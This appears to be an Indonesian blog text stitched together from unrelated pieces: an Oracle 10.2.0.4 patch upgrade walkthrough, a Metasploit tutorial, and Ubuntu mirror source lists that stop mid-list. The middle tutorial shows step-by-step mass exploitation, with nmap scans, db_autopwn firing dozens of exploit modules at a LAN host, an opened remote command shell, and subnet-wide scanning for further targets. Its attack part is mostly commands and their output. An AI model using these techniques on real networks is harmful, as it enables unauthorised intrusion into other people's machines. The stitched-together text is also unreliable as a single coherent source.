Cayooo.. ayo dites menu-menunya nyookk…. sambil nunggu event JRE… sapa tau dapat door prizenya

Persiapan Sebelum Upgrade

• Download patch set number 6810189 dari metalink oracle.
  tentunya anda juga harus mempunyai account suppot identifier oracle (CSI) yang valid.
• Buat instan database
  Buat instan database dengan spesifikasi yang sama dengan database production. Dalam contoh ini saya menggunakan SID : ORCL
• Import database
  Import database dari backup server production, dengan cara yang biasa anda lakukan di environment anda, dan pastikan telah bekerja dengan baik.
• Matikan semua service oracle
  
  C:\> set oracle_sid=ORCL
  C:\> isqlplusctl stop

  iSQL*Plus 10.2.0.1.0
  Copyright (c) 2003, 2005, Oracle.  All rights reserved.
  Stopping iSQL*Plus ...
  iSQL*Plus stopped.

  C:\> emctl stop dbconsole

  Oracle Enterprise Manager 10g Database Control Release 10.2.0.1.0
  Copyright (c) 1996, 2005 Oracle Corporation.  All rights reserved.
  
  https://jtim:1158/em/console/aboutApplication
  
  The OracleDBConsoleORCL service is stopping.............
  The OracleDBConsoleORCL service was stopped successfully.

  C:\> lsnrctl stop

  LSNRCTL for 32-bit Windows: Version 10.2.0.1.0 - Production on 05-APR-2009 21:26:17
  Copyright (c) 1991, 2005, Oracle.  All rights reserved.
  Connecting to (DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=jtim)(PORT=1521))
  )
  The command completed successfully

  C:\> sqlplus /nolog

  SQL*Plus: Release 10.2.0.1.0 - Production on Sun Apr 5 21:27:38 2009
  Copyright (c) 1982, 2005, Oracle.  All rights reserved.
  SQL>

  SQL> conn / as sysdba
  Connected.
  SQL> shutdown abort

  Database closed.
  Database dismounted.
  ORACLE instance shut down.
  SQL>

  apabila ingin shutdown semua service menggunakan windows service :

  C:\> net stop OracleOraDB10g_Home1iSQL*Plus
  C:\> net stop OracleDBConsoleORCL
  C:\> net stop OracleOraDB10g_Home1TNSListener
  C:\> net stop OracleServiceORCL
• Matikan juga service Mirosoft Distributed Transaction Coordinator apabila ada atau berjalan
  C:\> net stop msdtc

  The Distributed Transaction Coordinator service is stopping.
  The Distributed Transaction Coordinator service was stopped successfully.

Upgrade database Oracle 10.2.0.4
Sebelum melakukan upgrade, silahkan baca terlebih dahulu dokumentasi yang telah disertakan di patch upgrade tersebut.

• Jalankan Oracle Universal Installer (oui.exe) dari instalasi oracle 10.2.0.4 di folder install, dan setelah welcome screen muncul, tekan Next :



• Pilih home Oracle oracle yang akan diupgrade (jangan membuat home directory baru lagi) kemudian tekan Next :



• Oracle Installer akan melakukan pengecekan system requirement, tekan Next untuk melanjutkan ke screen berikutnya :



• Masukkan data customer identification number (CSI) anda, kemudian tekan Next :



• Summary installation, tekan Install untuk melakukan instalasi :



• Installasi upgrade patch Oracle telah selesai. Tekan Exit :

Testing Instalasi Upgrade Oracle

• Start database dalam mode upgrade (testing upgrade) :
  C:\>sqlplus /nolog

  SQL*Plus: Release 10.2.0.4.0 - Production on Mon Apr 6 15:39:00 2009
  Copyright (c) 1982, 2007, Oracle.  All Rights Reserved.
  SQL> 

  SQL> conn / as sysdba

  Connected to an idle instance.
  SQL>

  SQL> startup upgrade

  ORACLE instance started.
  Total System Global Area  289406976 bytes
  Fixed Size                  1296308 bytes
  Variable Size             142608460 bytes
  Database Buffers          138412032 bytes
  Redo Buffers                7090176 bytes
  Database mounted.
  Database opened.
  SQL>

• Jalankan script test patch di $ORACLE_HOME\RDBMS\ADMIN\catupgrd.sql dengan spool diaktifkan terlebih dahulu.
  SQL> spool patch.log
  SQL> @D:\oracle\product\10.2.0\RDBMS\ADMIN\catupgrd.sql

  SQL> @D:\oracle\product\10.2.0\RDBMS\ADMIN\catupgrd.sql
  DOC>######################################################################
  DOC>######################################################################
  DOC>	The following statement will cause an "ORA-01722: invalid number"
  DOC>	error if the user running this script is not SYS.  Disconnect
  DOC>	and reconnect with AS SYSDBA.
  DOC>######################################################################
  DOC>######################################################################
  DOC>#
  no rows selected
  DOC>######################################################################
  DOC>######################################################################
  DOC>	The following statement will cause an "ORA-01722: invalid number"
  DOC>	error if the database server version is not correct for this script.
  DOC>	Shutdown ABORT and use a different script or a different server.
  DOC>######################################################################
  DOC>######################################################################
  DOC>#
  no rows selected
  DOC>#######################################################################
  DOC>#######################################################################
  DOC>   The following statement will cause an "ORA-01722: invalid number"
  DOC>   error if the database has not been opened for UPGRADE.
  DOC>
  DOC>   Perform a "SHUTDOWN ABORT"  and
  DOC>   restart using UPGRADE.
  DOC>#######################################################################
  DOC>#######################################################################
  DOC>#
  no rows selected
  DOC>#######################################################################
  DOC>#######################################################################
  DOC>	The following statements will cause an "ORA-01722: invalid number"
  DOC>	error if the SYSAUX tablespace does not exist or is not
  DOC>	ONLINE for READ WRITE, PERMANENT, EXTENT MANAGEMENT LOCAL, and
  DOC>	SEGMENT SPACE MANAGEMENT AUTO.
  DOC>
  DOC>	The SYSAUX tablespace is used in 10.1 to consolidate data from
  DOC>	a number of tablespaces that were separate in prior releases.
  DOC>	Consult the Oracle Database Upgrade Guide for sizing estimates.
  DOC>
  DOC>	Create the SYSAUX tablespace, for example,
  DOC>
  DOC>	 create tablespace SYSAUX datafile 'sysaux01.dbf'
  DOC>	     size 70M reuse
  DOC>	     extent management local
  DOC>	     segment space management auto
  DOC>	     online;
  DOC>
  DOC>	Then rerun the catupgrd.sql script.
  DOC>#######################################################################
  DOC>#######################################################################
  DOC>#
  no rows selected
  no rows selected
  no rows selected
  no rows selected
  no rows selected
  Session altered.
  Session altered.
  Table created.
  2 rows deleted.
  1 row created.
  Commit complete.
  TIMESTAMP
  ------------------------------------------------------------
  COMP_TIMESTAMP UPGRD__BGN 2009-04-06 16:43:38 2454928 60218
  - - - - - dipotong sampe disini coz panjang bgt - - - -

  Proses ini akan memakan waktu yang lumayan lama bergantung besar database dan resource hardware anda. Apabila proses test sudah selesai periksa terlebih dahulu hasil test tersebut (patch.log) baik berupa error ataupun komponen yang gagal terupdate. Apabila sudah dilakukan perbaikan silahkan dites ulang menggunakan script diatas.

• Restart database ke mode seperti biasa (normal) dan jalankan script $ORACLE_HOME\RDBMS\ADMIN\utlrp.sql untuk mengkompile ulang semua packages yang invalid (optional) :
  SQL> shutdown immediate

  Database closed.
  Database dismounted.
  ORACLE instance shut down.

  SQL> startup

  ORACLE instance started.
  Total System Global Area  289406976 bytes
  Fixed Size                  1296308 bytes
  Variable Size             192940108 bytes
  Database Buffers           88080384 bytes
  Redo Buffers                7090176 bytes
  Database mounted.
  Database opened.

  SQL> @D:\oracle\product\10.2.0\RDBMS\ADMIN\utlrp.sql

  TIMESTAMP
  -------------------------------------------------------------------------------
  COMP_TIMESTAMP UTLRP_BGN  2009-04-06 17:21:12
  DOC>   The following PL/SQL block invokes UTL_RECOMP to recompile invalid
  DOC>   objects in the database. Recompilation time is proportional to the
  DOC>   number of invalid objects in the database, so this command may take
  DOC>   a long time to execute on a database with a large number of invalid
  DOC>   objects.
  DOC>
  DOC>   Use the following queries to track recompilation progress:
  DOC>
  DOC>   1. Query returning the number of invalid objects remaining. This
  DOC>      number should decrease with time.
  DOC>         SELECT COUNT(*) FROM obj$ WHERE status IN (4, 5, 6);
  DOC>
  DOC>   2. Query returning the number of objects compiled so far. This number
  DOC>      should increase with time.
  DOC>         SELECT COUNT(*) FROM UTL_RECOMP_COMPILED;
  DOC>
  DOC>   This script automatically chooses serial or parallel recompilation
  DOC>   based on the number of CPUs available (parameter cpu_count) multiplied
  DOC>   by the number of threads per CPU (parameter parallel_threads_per_cpu).
  DOC>   On RAC, this number is added across all RAC nodes.
  DOC>
  DOC>   UTL_RECOMP uses DBMS_SCHEDULER to create jobs for parallel
  DOC>   recompilation. Jobs are created without instance affinity so that they
  DOC>   can migrate across RAC nodes. Use the following queries to verify
  DOC>   whether UTL_RECOMP jobs are being created and run correctly:
  DOC>
  DOC>   1. Query showing jobs created by UTL_RECOMP
  DOC>         SELECT job_name FROM dba_scheduler_jobs
  DOC>            WHERE job_name like 'UTL_RECOMP_SLAVE_%';
  DOC>
  DOC>   2. Query showing UTL_RECOMP jobs that are running
  DOC>         SELECT job_name FROM dba_scheduler_running_jobs
  DOC>            WHERE job_name like 'UTL_RECOMP_SLAVE_%';
  DOC>#
  TIMESTAMP
  -------------------------------------------------------------------------------
  COMP_TIMESTAMP UTLRP_END  2009-04-06 17:22:10
  DOC> The following query reports the number of objects that have compiled
  DOC> with errors (objects that compile with errors have status set to 3 in
  DOC> obj$). If the number is higher than expected, please examine the error
  DOC> messages reported with each object (using SHOW ERRORS) to see if they
  DOC> point to system misconfiguration or resource constraints that must be
  DOC> fixed before attempting to recompile these objects.
  DOC>#
  OBJECTS WITH ERRORS
  -------------------
                    0
  DOC> The following query reports the number of errors caught during
  DOC> recompilation. If this number is non-zero, please query the error
  DOC> messages in the table UTL_RECOMP_ERRORS to see if any of these errors
  DOC> are due to misconfiguration or resource constraints that must be
  DOC> fixed before objects can compile successfully.
  DOC>#
  ERRORS DURING RECOMPILATION
  ---------------------------
                            0
  SQL>

Proses patch upgrade telah selesai dilakukan silahkan restart seluruh service atau reboot komputer anda.

Metode mass exploit secara vertikal
Ya dah langsung kita coba aja ke satu mesin yang sudah kita siapkan sebelumnya.

- Jalankan metasploit console dari shell :

$ sudo msfconsole

                                  _
                                 | |      o
 _  _  _    _ _|_  __,   ,    _  | |  __    _|_
/ |/ |/ |  |/  |  /  |  / \_|/ \_|/  /  \_|  |
  |  |  |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
                           /|
                           \|
       =[ msf v3.3-dev
+ -- --=[ 359 exploits - 233 payloads
+ -- --=[ 20 encoders - 7 nops
       =[ 132 aux

- Jalankan plugin mysql terlebih dahulu (saya menggunakan mysql database)

msf > load db_mysql

[*] Successfully loaded plugin: db_mysql

- Sambungkan metasploit dengan database di MySQL

msf > db_connect msf:msf@localhost/metasploit
msf >

- Scan mesin target menggunakan nmap untuk melihat port yang terbuka.
Hasil scan ini akan tersimpan otomatis kedalam database yang telah disiapkan sebelumnya.

msf > db_nmap -v -sS 192.168.1.10

[*] exec: "/usr/bin/nmap" "-v" "-sS" "192.168.1.10" "-oX" "/tmp/dbnmap20090404-13424-19l1thf-0"
NMAP:
NMAP: Starting Nmap 4.62 ( http://nmap.org ) at 2009-04-04 17:35 CIT
NMAP: Initiating ARP Ping Scan at 17:35
NMAP: Scanning 192.168.1.10 [1 port]
NMAP: Completed ARP Ping Scan at 17:35, 0.00s elapsed (1 total hosts)
NMAP: Initiating Parallel DNS resolution of 1 host. at 17:35
NMAP: Completed Parallel DNS resolution of 1 host. at 17:35, 0.00s elapsed
NMAP: Initiating SYN Stealth Scan at 17:35
NMAP: Scanning 192.168.1.10 [1715 ports]
NMAP: Discovered open port 1723/tcp on 192.168.1.10
NMAP: Discovered open port 3389/tcp on 192.168.1.10
NMAP: Discovered open port 139/tcp on 192.168.1.10
NMAP: Discovered open port 1025/tcp on 192.168.1.10
NMAP: Discovered open port 1026/tcp on 192.168.1.10
NMAP: Discovered open port 445/tcp on 192.168.1.10
NMAP: Discovered open port 1043/tcp on 192.168.1.10
NMAP: Discovered open port 12345/tcp on 192.168.1.10
NMAP: Discovered open port 1521/tcp on 192.168.1.10
NMAP: Discovered open port 135/tcp on 192.168.1.10
NMAP: Discovered open port 3372/tcp on 192.168.1.10
NMAP: Discovered open port 1433/tcp on 192.168.1.10
NMAP: Completed SYN Stealth Scan at 17:35, 0.67s elapsed (1715 total ports)
NMAP: Host 192.168.1.10 appears to be up ... good.
NMAP: Interesting ports on 192.168.1.10:
NMAP: Not shown: 1703 closed ports
NMAP: PORT      STATE SERVICE
NMAP: 135/tcp   open  msrpc
NMAP: 139/tcp   open  netbios-ssn
NMAP: 445/tcp   open  microsoft-ds
NMAP: 1025/tcp  open  NFS-or-IIS
NMAP: 1026/tcp  open  LSA-or-nterm
NMAP: 1043/tcp  open  boinc
NMAP: 1433/tcp  open  ms-sql-s
NMAP: 1521/tcp  open  oracle
NMAP: 1723/tcp  open  pptp
NMAP: 3372/tcp  open  msdtc
NMAP: 3389/tcp  open  ms-term-serv
NMAP: 12345/tcp open  netbus
NMAP: MAC Address: 00:1C:C0:50:B9:00 (Intel Corporate)
NMAP:
NMAP: Read data files from: /usr/share/nmap
NMAP: Nmap done: 1 IP address (1 host up) scanned in 0.872 seconds
NMAP: Raw packets sent: 1716 (75.502KB) | Rcvd: 1716 (78.932KB)
msf >

- Untuk mengetahui opsi-opsi db_autopwn, bisa dilihat terlebih dahulu dari menu help-nya. Silahkan anda coba dan pelajari opsi-opsi tersebut dengan berbagai kombinasi yang anda inginkan

msf > db_autopwn -h

[*] Usage: db_autopwn [options]
	-h          Display this help text
	-t          Show all matching exploit modules
	-x          Select modules based on vulnerability references
	-p          Select modules based on open ports
	-e          Launch exploits against all matched targets
	-r          Use a reverse connect shell
	-b          Use a bind shell on a random port
	-q          Disbale exploit module output
	-I  [range] Only exploit hosts inside this range
	-X  [range] Always exclude hosts inside this range
	-PI [range] Only exploit hosts with these ports open
	-PX [range] Always exclude hosts with these ports open
	-m  [regex] Only run modules whose name matches the regex
msf >

- db_autopwn akan kita jalankan menggunakan modul-modul exploit yang sesuai dengan port-port yang sebelumnya telah tersimpan di database

msf > db_autopwn -p -t

[*] Analysis completed in 6.07385802268982 seconds (0 vulns / 0 refs)
[*] Matched auxiliary/dos/windows/smb/rras_vls_null_deref against 192.168.1.10:445...
[*] Matched auxiliary/admin/mssql/mssql_exec against 192.168.1.10:1433...
[*] Matched exploit/windows/smb/ms05_039_pnp against 192.168.1.10:445...
[*] Matched auxiliary/admin/db2/db2rcmd against 192.168.1.10:445...
[*] Matched auxiliary/scanner/mssql/mssql_login against 192.168.1.10:1433...
[*] Matched auxiliary/dos/windows/smb/ms06_063_trans against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms06_025_rasmans_reg against 192.168.1.10:445...
[*] Matched auxiliary/scanner/smb/login against 192.168.1.10:445...
[*] Matched auxiliary/dos/windows/smb/ms05_047_pnp against 192.168.1.10:445...
[*] Matched auxiliary/dos/samba/lsa_transnames_heap against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms06_025_rras against 192.168.1.10:445...
[*] Matched auxiliary/dos/samba/lsa_addprivs_heap against 192.168.1.10:445...
[*] Matched exploit/windows/smb/psexec against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms06_066_nwapi against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms06_040_netapi against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms04_011_lsass against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms03_049_netapi against 192.168.1.10:445...
[*] Matched exploit/windows/dcerpc/ms03_026_dcom against 192.168.1.10:135...
[*] Matched exploit/solaris/samba/lsa_transnames_heap against 192.168.1.10:445...
[*] Matched exploit/multi/samba/nttrans against 192.168.1.10:139...
[*] Matched auxiliary/dos/windows/smb/vista_negotiate_stop against 192.168.1.10:445...
[*] Matched auxiliary/dos/windows/smb/ms09_001_write against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms08_067_netapi against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms04_031_netdde against 192.168.1.10:445...
[*] Matched exploit/windows/smb/msdns_zonename against 192.168.1.10:445...
[*] Matched exploit/linux/pptp/poptop_negative_read against 192.168.1.10:1723...
[*] Matched exploit/windows/brightstor/etrust_itm_alert against 192.168.1.10:445...
[*] Matched exploit/solaris/samba/trans2open against 192.168.1.10:139...
[*] Matched exploit/osx/samba/trans2open against 192.168.1.10:139...
[*] Matched exploit/osx/samba/lsa_transnames_heap against 192.168.1.10:445...
[*] Matched exploit/netware/smb/lsass_cifs against 192.168.1.10:445...
[*] Matched auxiliary/scanner/dcerpc/management against 192.168.1.10:135...
[*] Matched auxiliary/scanner/dcerpc/endpoint_mapper against 192.168.1.10:135...
[*] Matched exploit/windows/smb/ms06_066_nwwks against 192.168.1.10:445...
[*] Matched exploit/windows/mssql/ms02_056_hello against 192.168.1.10:1433...
[*] Matched exploit/linux/samba/lsa_transnames_heap against 192.168.1.10:445...
[*] Matched auxiliary/dos/windows/smb/ms06_035_mailslot against 192.168.1.10:445...
[*] Matched auxiliary/admin/mssql/mssql_sql against 192.168.1.10:1433...
[*] Matched exploit/windows/smb/ms04_007_killbill against 192.168.1.10:445...
msf >

- Lakukan exploitasi system dengan menambahkan opsi -e :

msf > db_autopwn -p -t -e

[*] Analysis completed in 6.27089881896973 seconds (0 vulns / 0 refs)
[*] Matched auxiliary/dos/windows/smb/rras_vls_null_deref against 192.168.1.10:445...
[*] Matched auxiliary/admin/mssql/mssql_exec against 192.168.1.10:1433...
[*] Matched exploit/windows/smb/ms05_039_pnp against 192.168.1.10:445...
[*] (3/39): Launching exploit/windows/smb/ms05_039_pnp against 192.168.1.10:445...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched auxiliary/admin/db2/db2rcmd against 192.168.1.10:445...
[*] Matched auxiliary/scanner/mssql/mssql_login against 192.168.1.10:1433...
[*] Matched auxiliary/dos/windows/smb/ms06_063_trans against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms06_025_rasmans_reg against 192.168.1.10:445...
[*] Matched auxiliary/scanner/smb/login against 192.168.1.10:445...
[*] Matched auxiliary/dos/windows/smb/ms05_047_pnp against 192.168.1.10:445...
[*] Matched auxiliary/dos/samba/lsa_transnames_heap against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms06_025_rras against 192.168.1.10:445...
[*] Matched auxiliary/dos/samba/lsa_addprivs_heap against 192.168.1.10:445...
[*] Matched exploit/windows/smb/psexec against 192.168.1.10:445...
[*] (13/39): Launching exploit/windows/smb/psexec against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms06_066_nwapi against 192.168.1.10:445...
[*] (14/39): Launching exploit/windows/smb/ms06_066_nwapi against 192.168.1.10:445...
[*] Started bind handler
[-] Exploit failed: No encoders encoded the buffer successfully.
[*] Connecting to the server...
[*] Matched exploit/windows/smb/ms06_040_netapi against 192.168.1.10:445...
[*] Authenticating as user 'Administrator'...
[*] (15/39): Launching exploit/windows/smb/ms06_040_netapi against 192.168.1.10:445...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched exploit/windows/smb/ms04_011_lsass against 192.168.1.10:445...
[*] (16/39): Launching exploit/windows/smb/ms04_011_lsass against 192.168.1.10:445...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[-] Exploit failed: Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0)
[*] Matched exploit/windows/smb/ms03_049_netapi against 192.168.1.10:445...
[*] (17/39): Launching exploit/windows/smb/ms03_049_netapi against 192.168.1.10:445...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched exploit/windows/dcerpc/ms03_026_dcom against 192.168.1.10:135...
[*] (18/39): Launching exploit/windows/dcerpc/ms03_026_dcom against 192.168.1.10:135...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched exploit/solaris/samba/lsa_transnames_heap against 192.168.1.10:445...
[*] (19/39): Launching exploit/solaris/samba/lsa_transnames_heap against 192.168.1.10:445...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched exploit/multi/samba/nttrans against 192.168.1.10:139...
[*] (20/39): Launching exploit/multi/samba/nttrans against 192.168.1.10:139...
[*] Matched auxiliary/dos/windows/smb/vista_negotiate_stop against 192.168.1.10:445...
[*] Matched auxiliary/dos/windows/smb/ms09_001_write against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms08_067_netapi against 192.168.1.10:445...
[*] (23/39): Launching exploit/windows/smb/ms08_067_netapi against 192.168.1.10:445...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched exploit/windows/smb/ms04_031_netdde against 192.168.1.10:445...
[*] (24/39): Launching exploit/windows/smb/ms04_031_netdde against 192.168.1.10:445...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched exploit/windows/smb/msdns_zonename against 192.168.1.10:445...
[*] (25/39): Launching exploit/windows/smb/msdns_zonename against 192.168.1.10:445...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched exploit/linux/pptp/poptop_negative_read against 192.168.1.10:1723...
[*] (26/39): Launching exploit/linux/pptp/poptop_negative_read against 192.168.1.10:1723...
[-] Exploit failed: wrong number of arguments (1 for 0)
[*] Matched exploit/windows/brightstor/etrust_itm_alert against 192.168.1.10:445...
[*] (27/39): Launching exploit/windows/brightstor/etrust_itm_alert against 192.168.1.10:445...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched exploit/solaris/samba/trans2open against 192.168.1.10:139...
[*] (28/39): Launching exploit/solaris/samba/trans2open against 192.168.1.10:139...
[*] Matched exploit/osx/samba/trans2open against 192.168.1.10:139...
[*] Matched exploit/osx/samba/lsa_transnames_heap against 192.168.1.10:445...
[*] (30/39): Launching exploit/osx/samba/lsa_transnames_heap against 192.168.1.10:445...
[*] Started bind handler
[*] Binding to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.1.10[\lsarpc]...
[*] Bound to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.1.10[\lsarpc]...
[*] Getting OS information...
[*] Trying to exploit Windows 5.1
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Server appears to have been patched
[*] Triggering the vulnerability...
[*] Command shell session 1 opened (192.168.1.6:46451 -> 192.168.1.10:29595)
[*] Matched exploit/netware/smb/lsass_cifs against 192.168.1.10:445...
[*] (31/39): Launching exploit/netware/smb/lsass_cifs against 192.168.1.10:445...
[*] Matched auxiliary/scanner/dcerpc/management against 192.168.1.10:135...
[*] Matched auxiliary/scanner/dcerpc/endpoint_mapper against 192.168.1.10:135...
[*] Matched exploit/windows/smb/ms06_066_nwwks against 192.168.1.10:445...
[*] (34/39): Launching exploit/windows/smb/ms06_066_nwwks against 192.168.1.10:445...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched exploit/windows/mssql/ms02_056_hello against 192.168.1.10:1433...
[*] (35/39): Launching exploit/windows/mssql/ms02_056_hello against 192.168.1.10:1433...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched exploit/linux/samba/lsa_transnames_heap against 192.168.1.10:445...
[*] Matched auxiliary/dos/windows/smb/ms06_035_mailslot against 192.168.1.10:445...
[*] Matched auxiliary/admin/mssql/mssql_sql against 192.168.1.10:1433...
[*] Matched exploit/windows/smb/ms04_007_killbill against 192.168.1.10:445...
msf >

- Eksploitasi telah selesai. Periksa session yang aktif dengan menuliskan perintah session -l. Apabila ada message no active session berarti eksploitasi yang kita lakukan gagal.

msf > sessions -l

Active sessions
===============
  Id  Description    Tunnel
  --  -----------    ------
  1   Command shell  192.168.1.6:46451 -> 192.168.1.10:29595

- Dari message diatas diketahui eksploitasi telah berhasil dilakukan dan ada 1 sesi yang aktif, yaitu session dengan id 1. Untuk berinteraksi dengan session yang aktif :

msf > sessions -i 1

[*] Starting interaction with 1...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>

C:\WINDOWS\system32>ipconfig

ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 192.168.1.10
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.1.254
C:\WINDOWS\system32>

Owned… !!

Metode mass exploit secara horisontal / linier
Sebenarnya cara yang dipakai dalam metode ini sama dengan metode sebelumnya, yang membedakan adalah model pencarian port yang terbuka. Cara ini lebih fokus kepada pencarian kelemahan sistem pada port tertentu dalam suatu network. Jadi yang pegang peranan dalam pemilihan metode ini sebenarnya adalah pada kustomisasi command di nmap. Contoh paling mudah yaitu memanfaatkan exploit MS Windows MS08-067 seperti artikel terdahulu. Test case kali ini memanfaatkan exploit tersebut di dalam network lokal saya : 192.168.1.0/24.
Silahkan anda ikuti saja tutorial seperti metode yang diatas hanya saja command pencarian port yang terbuka diubah menjadi :

msf > nmap -sS -p 445 -n -T Aggressive 192.168.1.0/24

[*] exec: nmap -sS -p 445 -n -T Aggressive 192.168.1.0/24
Starting Nmap 4.62 ( http://nmap.org ) at 2009-04-05 17:06 CIT
Interesting ports on 192.168.1.6:
PORT    STATE  SERVICE
445/tcp closed microsoft-ds
Interesting ports on 192.168.1.10:
PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 00:1C:C0:50:B9:00 (Intel Corporate)
Interesting ports on 192.168.1.12:
PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 00:11:2F:A6:03:9F (Asustek Computer)
Interesting ports on 192.168.1.20:
PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 00:1E:8C:CC:07:2A (Asustek Computer)
Interesting ports on 192.168.1.26:
PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 00:04:23:6E:EC:AD (Intel)
Interesting ports on 192.168.1.28:
PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 00:1E:8C:67:59:F9 (Asustek Computer)
Interesting ports on 192.168.1.30:
PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 00:1E:EC:79:94:F7 (Compal Information (kunshan) CO.)
Interesting ports on 192.168.1.103:
PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 00:18:DE:07:3D:91 (Intel)
Interesting ports on 192.168.1.254:
PORT    STATE  SERVICE
445/tcp closed microsoft-ds
MAC Address: 00:1D:7E:27:BA:E6 (Cisco-Linksys)
Nmap done: 256 IP addresses (9 hosts up) scanned in 2.566 seconds
msf >

Apabila anda masih mengalami kesulitan dalam menerapkan metode ini, silahkan anda baca artikel yang juga sudah lengkap dengan step by step-nya dari blog temen-temen kecoak disini atau blognya pakde HDM disini.

Nah… sekarang coba anda bayangkan, gimana kalo kedua metode tersebut digabung? Dalam artian melakukan scaning ke SEMUA port terbuka dalam suatu network? Atau malah scanning ke network berkelas A.. Silahkan anda bayangkan sendiri..
Kalo bayangan saya ya kompi anda pasti hang apalagi kalo resource hardwarenya pas-pasan kaya saya ini hehehe.. Atau malah lebih sadis lagi kalo anda gunakan untuk scanning di internet bisa-bisa diblokir ma ISP-nya haha….
Sebenarnya teknik-teknik ini kurang bagus, karena eksploitasi yang dilakukan tergolong ngawor, karena dengan hanya ber-ASUMSI pada port terbuka, maka db_autopwn akan menjalankan SEMUA modul yang ada dengan spesifikasi port tersebut, ndak peduli modul yang dipanggil relevan apa tidak dengan vulner/sistem yang terkait.
Supaya eksploitasi sistem lebih fokus dan terarah dapat juga menggunakan tools nessus, karena kita dapat memanfaatkan cross referencing mode (opsi -x) di db_autopwn. Artikelnya nyusul yah, karena laptop ini belum ada nessusnya. Abis fresh install

Seperti biasa, use this article wisely. Saya ndak akan nulis artikel ini utk tujuan pendidikan semata, penulis tidak bertanggung jawab bla..bla..bla.. Tapi saya lebih suka menggugah kesadaran anda saja.

Sumber, kredit, dan tautan terkait :
- http://www.kecoak-elektronik.net
- http://blog.metasploit.com

Repositori Kambing (UI — Telkom, Indosat, OpenIXP, INHERENT)
Informasi situs: http://kambing.ui.edu

### sources.list.kambing
### Repository dengan menggunakan server mirror kambing.ui.edu
### Untuk rilis lain selain gutsy silakan ganti semua kata gutsy
### dengan misalnya dapper atau feisty dsb
## REPOSITORY UTAMA
deb http://kambing.ui.edu/ubuntu gutsy main restricted universe multiverse
deb-src http://kambing.ui.edu/ubuntu gutsy main restricted universe multiverse
## INI UNTUK MAJOR BUG FIX UPDATES
deb http://kambing.ui.edu/ubuntu gutsy-updates main restricted universe multiverse
deb-src http://kambing.ui.edu/ubuntu gutsy-updates main restricted universe multiverse
## INI UNTUK UBUNTU SECURITY UPDATES
deb http://kambing.ui.edu/ubuntu gutsy-security main restricted universe multiverse
deb-src http://kambing.ui.edu/ubuntu gutsy-security main restricted universe multiverse

Cara penggunaan:

wget http://arsip.ubuntu-id.org/berkas/sources.list.kambing
sudo mv /etc/apt/sources.list /etc/apt/sources.list.original
sudo cp sources.list.kambing /etc/apt/sources.list
sudo apt-get update

Repositori CBN Mirror (OpenIXP)
Informasi situs: http://mirror.cbn.net.id

### sources.list.cbn
### Repository dengan menggunakan server mirror.cbn.net.id
### Untuk rilis lain selain gutsy silakan ganti semua kata gutsy
### dengan misalnya dapper atau feisty dsb
## REPOSITORY UTAMA
deb http://ubuntu.cbn.net.id/Ubuntu gutsy main restricted universe multiverse
deb-src http://ubuntu.cbn.net.id/Ubuntu gutsy main restricted universe multiverse
## INI UNTUK MAJOR BUG FIX UPDATES
deb http://ubuntu.cbn.net.id/Ubuntu gutsy-updates main restricted universe multiverse
deb-src http://ubuntu.cbn.net.id/Ubuntu gutsy-updates main restricted universe multiverse
## INI UNTUK UBUNTU SECURITY UPDATES
deb http://ubuntu.cbn.net.id/Ubuntu gutsy-security main restricted universe multiverse
deb-src http://ubuntu.cbn.net.id/Ubuntu gutsy-security main restricted universe multiverse

Cara penggunaan:

wget http://arsip.ubuntu-id.org/berkas/sources.list.cbn
sudo mv /etc/apt/sources.list /etc/apt/sources.list.original
sudo cp sources.list.cbn /etc/apt/sources.list
sudo apt-get update

Repositori Komo (OpenIXP)
Informasi situs: http://komo.vlsm.org

### sources.list.komo
### Repository dengan menggunakan server mirror komo.vlsm.org
### Untuk rilis lain selain gutsy silakan ganti semua kata gutsy
### dengan misalnya dapper atau feisty dsb
## REPOSITORY UTAMA
deb http://komo.vlsm.org/ubuntu gutsy main restricted universe multiverse
deb-src http://komo.vlsm.org/ubuntu/ gutsy main restricted universe multiverse
